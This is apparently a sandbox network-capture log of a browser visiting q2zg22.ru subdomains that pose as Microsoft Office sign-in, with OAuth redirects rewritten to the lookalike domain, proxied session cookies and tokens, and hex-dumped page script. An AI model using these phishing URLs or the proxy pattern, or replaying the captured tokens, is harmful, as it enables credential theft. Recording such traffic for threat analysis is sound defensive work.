                                                                                                                          2024-02-02 19:18:25 UTC1369INData Raw: 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 5c 75 30 30 32 36 73 63 6f 70 65 3d 6f 70 65 6e 69 64 2b 70 72 6f 66 69 6c 65 2b 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 76 32 25 32 66 4f 66 66 69 63 65 48 6f 6d 65 2e 41 6c 6c 5c 75 30 30 32 36 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 6c 61 6e 64 69 6e 67 76 32 5c 75 30 30 32 36 72 65 73 70 6f 6e 73 65 5f 74 79 70 65 3d 63 6f 64 65 2b 69 64 5f 74 6f 6b 65 6e 5c 75 30 30 32 36 73 74 61 74 65 3d 63 56 69 67 4a 30 4a 4b 54 66 39 5f 70 39 6e 77 72 4c 65 49 65 6a 70 4c 4c 4c 31 32 55 79 68 39 4f 50 4a 4f 64 65 77 58 51 6c
                                                                                                                          Data Ascii: 5b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2\u0026response_type=code+id_token\u0026state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQl
                                                                                                                          2024-02-02 19:18:25 UTC1369INData Raw: 64 22 3a 22 68 74 74 70 73 3a 2f 2f 79 77 6e 6a 62 2e 71 32 7a 67 32 32 2e 72 75 2f 6f 61 75 74 68 32 30 5f 61 75 74 68 6f 72 69 7a 65 2e 73 72 66 3f 63 6c 69 65 6e 74 5f 69 64 3d 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 5c 75 30 30 32 36 73 63 6f 70 65 3d 6f 70 65 6e 69 64 2b 70 72 6f 66 69 6c 65 2b 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 76 32 25 32 66 4f 66 66 69 63 65 48 6f 6d 65 2e 41 6c 6c 5c 75 30 30 32 36 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 25 32 66 6c 61 6e 64 69 6e 67 76 32 5c 75 30 30 32 36 72 65 73 70 6f 6e 73 65 5f 74 79 70 65 3d 63
                                                                                                                          Data Ascii: d":"https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2\u0026response_type=c
                                                                                                                          2024-02-02 19:18:25 UTC1369INData Raw: 58 7e c3 85 6c 61 6e 64 20 49 73 6c 61 6e 64 73 7e 33 35 38 21 21 21 41 4c 7e 41 6c 62 61 6e 69 61 7e 33 35 35 21 21 21 44 5a 7e 41 6c 67 65 72 69 61 7e 32 31 33 21 21 21 41 53 7e 41 6d 65 72 69 63 61 6e 20 53 61 6d 6f 61 7e 31 21 21 21 41 44 7e 41 6e 64 6f 72 72 61 7e 33 37 36 21 21 21 41 4f 7e 41 6e 67 6f 6c 61 7e 32 34 34 21 21 21 41 49 7e 41 6e 67 75 69 6c 6c 61 7e 31 21 21 21 41 47 7e 41 6e 74 69 67 75 61 20 61 6e 64 20 42 61 72 62 75 64 61 7e 31 21 21 21 41 52 7e 41 72 67 65 6e 74 69 6e 61 7e 35 34 21 21 21 41 4d 7e 41 72 6d 65 6e 69 61 7e 33 37 34 21 21 21 41 57 7e 41 72 75 62 61 7e 32 39 37 21 21 21 41 43 7e 41 73 63 65 6e 73 69 6f 6e 20 49 73 6c 61 6e 64 7e 32 34 37 21 21 21 41 55 7e 41 75 73 74 72 61 6c 69 61 7e 36 31 21 21 21 41 54 7e 41 75 73
                                                                                                                          Data Ascii: X~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Aus
                                                                                                                          2024-02-02 19:18:25 UTC1369INData Raw: 21 46 4f 7e 46 61 72 6f 65 20 49 73 6c 61 6e 64 73 7e 32 39 38 21 21 21 46 4a 7e 46 69 6a 69 7e 36 37 39 21 21 21 46 49 7e 46 69 6e 6c 61 6e 64 7e 33 35 38 21 21 21 46 52 7e 46 72 61 6e 63 65 7e 33 33 21 21 21 47 46 7e 46 72 65 6e 63 68 20 47 75 69 61 6e 61 7e 35 39 34 21 21 21 50 46 7e 46 72 65 6e 63 68 20 50 6f 6c 79 6e 65 73 69 61 7e 36 38 39 21 21 21 47 41 7e 47 61 62 6f 6e 7e 32 34 31 21 21 21 47 4d 7e 47 61 6d 62 69 61 7e 32 32 30 21 21 21 47 45 7e 47 65 6f 72 67 69 61 7e 39 39 35 21 21 21 44 45 7e 47 65 72 6d 61 6e 79 7e 34 39 21 21 21 47 48 7e 47 68 61 6e 61 7e 32 33 33 21 21 21 47 49 7e 47 69 62 72 61 6c 74 61 72 7e 33 35 30 21 21 21 47 52 7e 47 72 65 65 63 65 7e 33 30 21 21 21 47 4c 7e 47 72 65 65 6e 6c 61 6e 64 7e 32 39 39 21 21 21 47 44 7e 47
                                                                                                                          Data Ascii: !FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350!!!GR~Greece~30!!!GL~Greenland~299!!!GD~G
                                                                                                                          2024-02-02 19:18:25 UTC1369INData Raw: 4c 7e 4e 65 74 68 65 72 6c 61 6e 64 73 7e 33 31 21 21 21 4e 43 7e 4e 65 77 20 43 61 6c 65 64 6f 6e 69 61 7e 36 38 37 21 21 21 4e 5a 7e 4e 65 77 20 5a 65 61 6c 61 6e 64 7e 36 34 21 21 21 4e 49 7e 4e 69 63 61 72 61 67 75 61 7e 35 30 35 21 21 21 4e 45 7e 4e 69 67 65 72 7e 32 32 37 21 21 21 4e 47 7e 4e 69 67 65 72 69 61 7e 32 33 34 21 21 21 4e 55 7e 4e 69 75 65 7e 36 38 33 21 21 21 4e 46 7e 4e 6f 72 66 6f 6c 6b 20 49 73 6c 61 6e 64 7e 36 37 32 21 21 21 4b 50 7e 4e 6f 72 74 68 20 4b 6f 72 65 61 7e 38 35 30 21 21 21 4d 4b 7e 4e 6f 72 74 68 20 4d 61 63 65 64 6f 6e 69 61 7e 33 38 39 21 21 21 4d 50 7e 4e 6f 72 74 68 65 72 6e 20 4d 61 72 69 61 6e 61 20 49 73 6c 61 6e 64 73 7e 31 21 21 21 4e 4f 7e 4e 6f 72 77 61 79 7e 34 37 21 21 21 4f 4d 7e 4f 6d 61 6e 7e 39 36 38
                                                                                                                          Data Ascii: L~Netherlands~31!!!NC~New Caledonia~687!!!NZ~New Zealand~64!!!NI~Nicaragua~505!!!NE~Niger~227!!!NG~Nigeria~234!!!NU~Niue~683!!!NF~Norfolk Island~672!!!KP~North Korea~850!!!MK~North Macedonia~389!!!MP~Northern Mariana Islands~1!!!NO~Norway~47!!!OM~Oman~968
                                                                                                                          2024-02-02 19:18:25 UTC1369INData Raw: 7e 54 6f 6e 67 61 7e 36 37 36 21 21 21 54 54 7e 54 72 69 6e 69 64 61 64 20 61 6e 64 20 54 6f 62 61 67 6f 7e 31 21 21 21 54 41 7e 54 72 69 73 74 61 6e 20 64 61 20 43 75 6e 68 61 7e 32 39 30 21 21 21 54 4e 7e 54 75 6e 69 73 69 61 7e 32 31 36 21 21 21 54 52 7e 54 75 72 6b 65 79 7e 39 30 21 21 21 54 4d 7e 54 75 72 6b 6d 65 6e 69 73 74 61 6e 7e 39 39 33 21 21 21 54 43 7e 54 75 72 6b 73 20 61 6e 64 20 43 61 69 63 6f 73 20 49 73 6c 61 6e 64 73 7e 31 21 21 21 54 56 7e 54 75 76 61 6c 75 7e 36 38 38 21 21 21 56 49 7e 55 2e 53 2e 20 56 69 72 67 69 6e 20 49 73 6c 61 6e 64 73 7e 31 21 21 21 55 47 7e 55 67 61 6e 64 61 7e 32 35 36 21 21 21 55 41 7e 55 6b 72 61 69 6e 65 7e 33 38 30 21 21 21 41 45 7e 55 6e 69 74 65 64 20 41 72 61 62 20 45 6d 69 72 61 74 65 73 7e 39 37 31
                                                                                                                          Data Ascii: ~Tonga~676!!!TT~Trinidad and Tobago~1!!!TA~Tristan da Cunha~290!!!TN~Tunisia~216!!!TR~Turkey~90!!!TM~Turkmenistan~993!!!TC~Turks and Caicos Islands~1!!!TV~Tuvalu~688!!!VI~U.S. Virgin Islands~1!!!UG~Uganda~256!!!UA~Ukraine~380!!!AE~United Arab Emirates~971
                                                                                                                          2024-02-02 19:18:25 UTC1369INData Raw: 4b 54 65 55 30 71 6d 30 53 2d 65 62 55 67 71 6c 35 45 38 49 4a 59 52 41 49 45 4f 47 2d 4a 49 35 5a 48 6c 34 48 35 36 58 64 33 6a 65 54 32 6d 4c 4c 68 4e 6b 47 5a 54 42 46 77 57 38 44 50 59 5f 4a 36 73 30 52 5a 4c 55 41 43 58 77 49 59 32 53 7a 41 43 67 4e 63 4b 6d 55 63 78 69 69 48 57 45 56 2d 6c 68 66 33 61 39 74 4c 50 35 36 4a 38 48 75 39 57 76 36 7a 2d 66 5f 62 66 37 69 5f 6a 73 79 6a 6d 79 4e 34 37 6a 79 58 79 5f 55 6b 6d 53 70 42 79 4e 52 75 37 51 4c 67 2d 6a 6f 41 4c 37 6f 65 57 47 7a 68 4c 5f 48 55 45 65 49 38 68 5a 66 74 4d 4f 55 66 33 6f 50 44 2d 6e 69 52 71 4a 6b 30 79 4e 41 42 53 67 61 49 4b 6d 51 4e 6e 41 2d 5a 57 52 4f 53 76 54 45 32 4d 6a 55 34 46 79 41 45 42 62 4d 46 31 4a 67 37 34 5a 38 4c 47 73 4f 61 6e 43 2d 62 6a 73 38 56 6c 62 4d 36 47
                                                                                                                          Data Ascii: KTeU0qm0S-ebUgql5E8IJYRAIEOG-JI5ZHl4H56Xd3jeT2mLLhNkGZTBFwW8DPY_J6s0RZLUACXwIY2SzACgNcKmUcxiiHWEV-lhf3a9tLP56J8Hu9Wv6z-f_bf7i_jsyjmyN47jyXy_UkmSpByNRu7QLg-joAL7oeWGzhL_HUEeI8hZftMOUf3oPD-niRqJk0yNABSgaIKmQNnA-ZWROSvTE2MjU4FyAEBbMF1Jg74Z8LGsOanC-bjs8VlbM6G
                                                                                                                          2024-02-02 19:18:25 UTC1369INData Raw: 79 58 79 5f 55 6b 6d 53 70 42 79 4e 52 75 37 51 4c 67 2d 6a 6f 41 4c 37 6f 65 57 47 7a 68 4c 5f 48 55 45 65 49 38 68 5a 66 74 4d 4f 55 66 33 6f 50 44 2d 6e 69 52 71 4a 6b 30 79 4e 41 42 53 67 61 49 4b 6d 51 4e 6e 41 2d 5a 57 52 4f 53 76 54 45 32 4d 6a 55 34 46 79 41 45 42 62 4d 46 31 4a 67 37 34 5a 38 4c 47 73 4f 61 6e 43 2d 62 6a 73 38 56 6c 62 4d 36 47 4d 69 36 6e 4d 73 57 4d 44 6c 32 50 54 67 34 46 35 75 65 38 5a 6d 4b 51 35 75 4b 79 70 73 5a 79 78 72 71 4b 5a 6e 68 6d 6f 6d 52 6d 59 5f 70 50 38 4e 61 57 2d 69 4d 66 34 70 55 51 7a 4e 37 4e 66 35 4c 64 48 30 53 7a 6f 54 61 4a 35 66 46 62 34 4d 54 38 38 64 70 30 6d 61 4c 61 30 45 64 4f 62 4d 47 45 79 6b 32 7a 52 39 69 61 53 4a 47 47 34 6e 6f 34 5a 70 64 4e 55 4c 44 73 35 56 61 45 51 63 4a 44 75 38 49 73
                                                                                                                          Data Ascii: yXy_UkmSpByNRu7QLg-joAL7oeWGzhL_HUEeI8hZftMOUf3oPD-niRqJk0yNABSgaIKmQNnA-ZWROSvTE2MjU4FyAEBbMF1Jg74Z8LGsOanC-bjs8VlbM6GMi6nMsWMDl2PTg4F5ue8ZmKQ5uKypsZyxrqKZnhmomRmY_pP8NaW-iMf4pUQzN7Nf5LdH0SzoTaJ5fFb4MT88dp0maLa0EdObMGEyk2zR9iaSJGG4no4ZpdNULDs5VaEQcJDu8Is


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          86192.168.2.1649825104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:26 UTC2478OUTGET /Me.htm?v=3 HTTP/1.1
                                                                                                                          Host: ywnjb.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Purpose: prefetch
                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://office.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSPRequ=id=N&lt=1706901476&co=5; uaid=c9bbf5863cb749e4968c855cb9b06dff; MSCC=143.110.219.151-CA; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c; OParams=11O.Dqw7oMsnFRnIYqspcJbLIxKcamHyh9DSRrFQOg*Nk4BEID!tb86nwfFa41HP2PuAWs7t532JlwT6iqJhWGq3yuFIbenSo0UYE498Wf!KHCgLFDdDlQwdw2otFPT37WRzMLYo1ruiulbbhYr2kSBHpqXF1CIhhQJJaP*qA6IT80ZVTMByHul7ZkgnaNslrXLPMP0OM9mm6eQ*Zvk083BpRBi8JiucY81cU*1fHZ4pmzX!hKwqprOajzkT!GvWa4x5Ku7fIS*uaF8iAMfDDOKpmUgNscGdv9tSvkVXPmKRAfv08tIGcxzGG9!ahvrMKIAMwrmsUUc8dRUeyXwg6CtZxLWJW340n4b5!LZGRO1zT6VmRwB*nDwDYJLCwad06trcy5SNpBBLG59ODeo9MX5WDUfphgKUGMP50BJDdBVZ**GrCW871F4RKw412LyURsbTkk4oLv7kLw2XQbUkcPCiRtp8xiqxeYj2gqBd8XDQi5u0lrHh9Hqiotr4Iom7*GEiwPKusojvkDSUprLsgnm6E52UJ53S9q2PTgu7LH8tGaYIMXmFLWweEbHPqRJtB*N8kGkHcldoFXqx8mxCqq9mX2OKrCNhlE8oFgcHuS3hrRe3dao22d2lhKvpeAT8Ztj54Wml7e3tVbCL!kDmwyjh4ZoFBfAoa5nq4XnhZOTn2Yk3O2mLypSQQ80Jk*8TUk!9mcF5N6952ZYZZMkbIWNQ*VuOsb4mRwzJHd3wQGe8fCRxxwwQBIQtWBVcYTiYwcf4xVogI2eL!eCB*guT2JeJw2LRko5PdH3cL6FNZH3o9E!sLmZ4decOkrMJqb8I2ObA2yuWXIAfgeZxTqMmSfq2kSHJYBwJ2j!SRwSr4Ehgvl*Bev7I*ATli20PRk0RjblHLcmktfUWdSqNnhmJoxeE7yK3X847MpAPDrhdN86deMO3UBa5fmkhZS3qLKPMbybRkXQIvC!Va*6GVfGrBSQ93o*2PBUw8jmtevb8rpJiyYEc7xzk2tKqQkA5et6feN9QEWIe3cWw6o4PT7GcptF2igE7SY590WIaLoA8uG0ARkB4kNJzB2NPOmI1zuGdX7ohRBcncoEkSESvJ5HpbJjoOGS2zR2A7YX0oS5QJHI0IUgQNn1FB8SgbZDMALKS!sTrMV33GgBe7d8dwLCEnNXMZS2!3Sk8jnKDp1NiIBhpMlDp1x01x2jymLrcjeEXA4BgjQ$$; MicrosoftApplicationsTelemetryDeviceId=72c0f85c-d0f5-4e37-bf7f-5d43c41b787c; ai_session=pzuSdwV0qlEhCs1mb9CtVq|1706901479212|1706901479212
                                                                                                                          2024-02-02 19:18:26 UTC1162INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:26 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: Mon, 30 Jan 2034 19:18:26 GMT
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Ppserver: PPV: 30 H: SN1PEPF00010F4E V: 0
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Set-Cookie: uaid=8513f9b5312d44168775f3619e83fea6; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: MSPRequ=id=N&lt=1706901506&co=0; Path=/; Domain=ywnjb.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Ms-Request-Id: b07c27ba-fbf7-4156-997c-04a50dd2262f
                                                                                                                          X-Ms-Route-Info: C105_SN1
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gh1SOqINXm4xYx%2BpXvHNU98V%2BuLai0ttzW%2FNFkCX2Yb4cnSGtY7T2YASn91J2U5xmOOEWHIjidvq%2FzP23lppPnF8S%2F0xEi%2FCUxVq5ChduUHs2PWVdhgj23qCi8%2B7kpItilA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c7aeac4c12e7-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:18:26 UTC207INData Raw: 39 31 39 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 74 29 6e 5b 65 5d 3d 74 5b 65 5d 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 69 29 7b 69 66 28 65 5b 69 5d 29 72 65 74 75 72 6e 20 65 5b 69 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 73 3d 65 5b 69 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 69 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 6e 5b 69 5d 2e 63 61 6c 6c 28 73 2e 65 78 70 6f 72 74 73 2c 73 2c 73 2e 65
                                                                                                                          Data Ascii: 919<script type="text/javascript">!function(n,t){for(var e in t)n[e]=t[e]}(this,function(n){function t(i){if(e[i])return e[i].exports;var s=e[i]={exports:{},id:i,loaded:!1};return n[i].call(s.exports,s,s.e
                                                                                                                          2024-02-02 19:18:26 UTC1369INData Raw: 78 70 6f 72 74 73 2c 74 29 2c 73 2e 6c 6f 61 64 65 64 3d 21 30 2c 73 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 6d 3d 6e 2c 74 2e 63 3d 65 2c 74 2e 70 3d 22 22 2c 74 28 30 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 6e 29 7b 66 6f 72 28 76 61 72 20 74 3d 67 5b 63 5d 2c 65 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 65 3c 69 3b 2b 2b 65 29 69 66 28 74 5b 65 5d 3d 3d 3d 6e 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 69 28 6e 29 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 66 6f 72 28 76 61 72 20 74 3d 6e 2b 22 3d 22 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 69 3d 30 2c 73 3d 65 2e
                                                                                                                          Data Ascii: xports,t),s.loaded=!0,s.exports}var e={};return t.m=n,t.c=e,t.p="",t(0)}([function(n,t){function e(n){for(var t=g[c],e=0,i=t.length;e<i;++e)if(t[e]===n)return!0;return!1}function i(n){if(!n)return null;for(var t=n+"=",e=document.cookie.split(";"),i=0,s=e.
                                                                                                                          2024-02-02 19:18:26 UTC760INData Raw: 73 65 72 4c 69 73 74 2c 65 29 7d 63 61 74 63 68 28 6f 29 7b 74 2e 65 72 72 6f 72 3d 6f 2e 6d 65 73 73 61 67 65 7d 6e 26 26 6c 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 2c 6e 29 7d 76 61 72 20 6c 3d 77 69 6e 64 6f 77 2c 63 3d 22 70 72 6f 64 22 2c 70 3d 22 22 2c 66 3d 22 22 2c 64 3d 7b 4e 6f 6e 65 3a 30 2c 53 69 67 6e 65 64 49 6e 54 6f 52 50 3a 31 2c 53 69 67 6e 65 64 49 6e 54 6f 49 44 50 3a 32 2c 52 65 6d 65 6d 62 65 72 65 64 3a 33 7d 2c 75 3d 7b 4e 6f 6e 65 3a 30 2c 49 73 57 69 6e 64 6f 77 73 53 73 6f 3a 31 7d 2c 67 3d 7b 64 65 76 3a 5b 70 2c 66 5d 2c 22 69 6e 74 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 77 69 6e 64 6f 77 73 2d 70 70 65 2e 6e 65 74 22 5d 2c 70 72 6f 64 3a 5b
                                                                                                                          Data Ascii: serList,e)}catch(o){t.error=o.message}n&&l.parent.postMessage(JSON.stringify(t),n)}var l=window,c="prod",p="",f="",d={None:0,SignedInToRP:1,SignedInToIDP:2,Remembered:3},u={None:0,IsWindowsSso:1},g={dev:[p,f],"int":["https://login.windows-ppe.net"],prod:[
                                                                                                                          2024-02-02 19:18:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          87192.168.2.1649826172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:26 UTC3809OUTGET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; ESTSWCTXFLOWTOKEN=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6_pnhGoDhBgou9FA7aOdCkLjUWWNQnZ5kCDMiWbLxdEGhoHWW1LuK-vIr9PbdkktA9xaLrfVOAXEyss_lHk-Yb3Ft_HREp3zElGWHQaJ4VRu3di2hrvSd8OoGa-oejpBA0oMNQbpFrjl5rPQS1QnaAT-siwFQn3Wdo64-6EW-O4sOSDLtEprmVUPuo5AW5sq_kp59o4vIyfEe5ehf6XYbAt_VHs51bFjL0gTRp8A4lJk9Wuz7zyo0Q8zoOwGeOj4k-RqAIIo3GKJWZlozbOolHwKKo08zGtX7FU-QyTx8nssBxHM6A3tUft4BJ18KKCDidsmKLYzIPNBz0llbaLmEqx-uFE2tK-qdMPUt7Go3bShLWmR2qvomuzhkFaYpEqcCYXbVo_4gbO4-SH0YIi9G6rQvMfG_jbR9WVjKEzrzaAy58yzN6fFPRTBBb354gGQdqHLjDFtrC6cCZ5XHQM56r7SZ5UF0tWeVMRUkteA7QtYwIoAUF9RUXf9jfAtV8vEFm4p4Z9eDu_eILSIiwMRmUbyMKzZ-aSVPgZrSf-xVGNY6cDRkk-jv-YhXbGoaAx0qSAfVSsW3c6yxlPXtE9t5wWIcjSR0pzXKiCJsLmHiws0FRnRPSUfQgTdcjueLdj6IAA; 